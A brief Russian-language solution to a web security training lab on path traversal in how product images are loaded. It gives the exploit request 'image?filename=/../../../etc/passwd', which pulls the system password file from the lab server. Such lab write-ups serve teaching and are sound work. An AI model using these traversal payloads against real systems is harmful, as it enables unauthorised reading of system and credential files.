Эта лабораторная работа содержит уязвимость Path Traversal при отображении изображений продуктов.
Solution
На странице представлены товары:
На странице информация о товаре выдается по его id:
https://0a9b001d04fc186f81fd6bf600c3003a.web-security-academy.net/product?productId=1
Картинка каждого товара загружается с помощью запроса:
Такой запрос приводит к уязвимости Path Traversal. С помощью следующего запроса мы можем скачать файл с паролями:
https://0a9b001d04fc186f81fd6bf600c3003a.web-security-academy.net/image?filename=/../../../etc/passwd
